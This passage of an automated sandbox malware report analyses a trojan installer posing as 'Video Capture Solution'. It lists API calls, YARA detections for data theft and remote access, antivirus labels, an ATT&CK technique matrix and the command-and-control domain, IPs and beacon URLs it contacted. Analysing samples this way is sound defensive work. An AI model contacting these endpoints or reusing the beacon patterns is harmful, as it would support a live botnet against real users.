                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DBF85A cpuid 4_2_02DBF85A
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: GetLocaleInfoA,0_2_004051FC
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: GetLocaleInfoA,0_2_00405248
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: GetLocaleInfoA,1_2_00408558
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: GetLocaleInfoA,1_2_004085A4
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004583E8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004583E8
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00455570 GetUserNameA,1_2_00455570
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: videocapturesolution32.exe PID: 7156, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: videocapturesolution32.exe PID: 7156, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,4_2_609660FA
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,4_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,4_2_60963143
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,4_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,4_2_6096923E
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,4_2_6096A38C
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,4_2_6096748C
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,4_2_609254B1
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,4_2_6094B407
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6090F435 sqlite3_bind_parameter_index,4_2_6090F435
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,4_2_609255D4
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609255FF sqlite3_bind_text,4_2_609255FF
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,4_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,4_2_6094B54C
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,4_2_60925686
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,4_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,4_2_609256E5
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,4_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6092562A sqlite3_bind_blob,4_2_6092562A
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,4_2_60925655
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,4_2_6094C64A
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,4_2_609687A7
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,4_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,4_2_6092570B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095F772
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,4_2_60925778
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6090577D sqlite3_bind_parameter_name,4_2_6090577D
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,4_2_6094B764
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6090576B sqlite3_bind_parameter_count,4_2_6090576B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,4_2_6094A894
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095F883
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,4_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,4_2_6096281E
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,4_2_6096583A
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,4_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6094A92B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6090EAE5 sqlite3_transfer_bindings,4_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,4_2_6095FB98
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,4_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,4_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,4_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,4_2_60969D75
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,4_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Service Execution
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    2
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets251
                    Security Software Discovery
                    SSHKeylogging112
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    Remote System Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    System Network Configuration Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    AbC0LBkVhr.exe50%ReversingLabsWin32.Ransomware.Socks5Systemz
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\EShineEncoder\EShineEncoder.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe100%Joe Sandbox ML
                    C:\ProgramData\EShineEncoder\EShineEncoder.exe79%ReversingLabsWin32.Trojan.Ekstak
                    C:\ProgramData\EShineEncoder\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp4%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\LTDIS13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\bjpeg23.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-297HU.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-AK5QD.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-GSMNO.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-MJRUC.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-NF0AU.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-SILBO.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-VECUS.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\ltkrn13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\is-U1N6A.tmp3%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\unins000.exe (copy)3%ReversingLabs
                    C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe79%ReversingLabsWin32.Trojan.Ekstak
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e100%Avira URL Cloudsafe
                    http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df10%Avira URL Cloudsafe
                    http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e40%Avira URL Cloudsafe
                    ejvphud.ua0%Avira URL Cloudsafe
                    http://147.45.126.31/sea0%Avira URL Cloudsafe
                    http://147.45.126.31/0%Avira URL Cloudsafe
                    http://tintguide.com/ru/support.html0%Avira URL Cloudsafe
                    http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d0%Avira URL Cloudsafe
                    http://147.45.126.31/46122658-3693405117-2476756634-1002k0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ejvphud.ua
                    147.45.126.31
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10true
                      • Avira URL Cloud: safe
                      unknown
                      ejvphud.uatrue
                      • Avira URL Cloud: safe
                      unknown
                      http://ejvphud.ua/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923dtrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.drfalse
                        high
                        http://tintguide.com/ru/support.htmlAbC0LBkVhr.exe, 00000000.00000003.1706758940.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1706685088.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000002.2973496782.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973434034.000000000051F000.00000004.00000020.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973924658.0000000002228000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708897906.0000000003180000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708982513.0000000002228000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.remobjects.com/psUAbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.drfalse
                          high
                          http://www.remobjects.com/psAbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.drfalse
                            high
                            http://147.45.126.31/videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://147.45.126.31/46122658-3693405117-2476756634-1002kvideocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://147.45.126.31/seavideocapturesolution32.exe, 00000004.00000002.2974756897.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            46.8.225.74
                            unknownRussian Federation
                            28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                            147.45.126.31
                            ejvphud.uaRussian Federation
                            2895FREE-NET-ASFREEnetEUtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1576106
                            Start date and time:2024-12-16 14:51:09 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 34s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:AbC0LBkVhr.exe
                            renamed because original name is a hash value
                            Original Sample Name:038c7d5697bfbe553717357809e621bf.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@10/31@1/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 91%
                            • Number of executed functions: 191
                            • Number of non-executed functions: 271
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
